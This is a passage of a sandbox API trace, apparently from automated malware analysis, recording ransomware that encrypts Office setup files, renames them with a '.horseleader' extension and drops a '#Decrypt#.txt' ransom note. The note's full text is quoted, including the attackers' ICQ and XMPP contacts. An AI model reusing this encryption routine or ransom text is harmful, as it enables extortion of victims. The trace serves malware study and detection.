lpSrch=".horseleader") returned 0x0 [0244.377] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.377] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.377] lstrlenW (lpString=".testttjffg") returned 11 [0244.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0244.378] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.379] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2296) returned 1 [0244.379] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x8f8, lpOverlapped=0x0) returned 1 [0244.381] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, 
nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x8f8, lpOverlapped=0x0) returned 1 [0244.381] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.381] CloseHandle (hObject=0x15c) returned 1 [0244.381] GetProcessHeap () returned 0x780000 [0244.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.381] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.horseleader") returned 117 [0244.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.horseleader")) returned 1 [0244.382] GetProcessHeap () returned 0x780000 [0244.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.382] FindNextFileW (in: hFindFile=0x7c68a0, 
lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.382] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.382] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\#Decrypt#.txt") returned 109 [0244.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.395] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.395] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.397] lstrlenA (lpString="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") returned 1368 [0244.397] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.397] CloseHandle (hObject=0x1a4) returned 1 [0244.397] GetProcessHeap () returned 0x780000 [0244.397] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.397] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Groove.en-us", cAlternateFileName="GROOVE~1.EN-")) returned 1 [0244.397] lstrcmpiW (lpString1="Groove.en-us", lpString2="Windows") returned -1 [0244.397] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned 96 [0244.397] lstrcmpW (lpString1="Groove.en-us", lpString2=".") returned 1 [0244.397] lstrcmpW (lpString1="Groove.en-us", lpString2="..") returned 1 [0244.398] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 
-1 [0244.398] GetProcessHeap () returned 0x780000 [0244.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.398] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*") returned 98 [0244.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\.") returned 98 [0244.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.399] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\..") returned 99 [0244.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.399] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="GrooveMUI.XML", cAlternateFileName="GROOVE~1.XML")) returned 1 [0244.399] lstrcmpiW (lpString1="GrooveMUI.XML", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0244.399] StrStrIW (lpFirst="GrooveMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.399] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.400] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.400] lstrlenW (lpString=".testttjffg") returned 11 [0244.400] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.400] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.400] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.400] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0244.400] StrStrW (lpFirst="GrooveMUI.XML", lpSrch=".txt") returned 0x0 [0244.401] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=913) returned 1 [0244.401] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x391, lpOverlapped=0x0) returned 1 [0244.402] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x391, lpOverlapped=0x0) returned 1 [0244.403] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 
[0244.403] CloseHandle (hObject=0x15c) returned 1 [0244.403] GetProcessHeap () returned 0x780000 [0244.404] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.404] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.horseleader") returned 122 [0244.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.horseleader")) returned 1 [0244.404] GetProcessHeap () returned 0x780000 [0244.404] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.405] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee803530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.405] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.405] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 
106 [0244.405] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.405] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.405] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.405] lstrlenW (lpString=".testttjffg") returned 11 [0244.405] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.405] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 106 [0244.406] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.406] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1452) returned 1 [0244.406] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.408] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.409] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.409] CloseHandle (hObject=0x15c) returned 1 [0244.412] GetProcessHeap () returned 0x780000 [0244.412] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.412] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.horseleader") returned 118 [0244.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.horseleader")) returned 1 [0244.413] GetProcessHeap () returned 0x780000 [0244.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) 
returned 1 [0244.413] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee803530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.413] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.413] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\#Decrypt#.txt") returned 110 [0244.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.417] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.417] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.418] lstrlenA (lpString="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") returned 1368 [0244.418] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.418] CloseHandle (hObject=0x1a4) returned 1 [0244.418] GetProcessHeap () returned 0x780000 [0244.418] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="InfoPath.en-us", cAlternateFileName="INFOPA~1.EN-")) returned 1 [0244.418] lstrcmpiW (lpString1="InfoPath.en-us", lpString2="Windows") returned -1 [0244.418] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned 98 [0244.419] lstrcmpW (lpString1="InfoPath.en-us", lpString2=".") returned 1 [0244.419] lstrcmpW (lpString1="InfoPath.en-us", lpString2="..") returned 1 [0244.419] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us", lpString2="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop") returned -1 [0244.419] GetProcessHeap () returned 0x780000 [0244.419] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.419] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*") returned 100 [0244.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.420] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 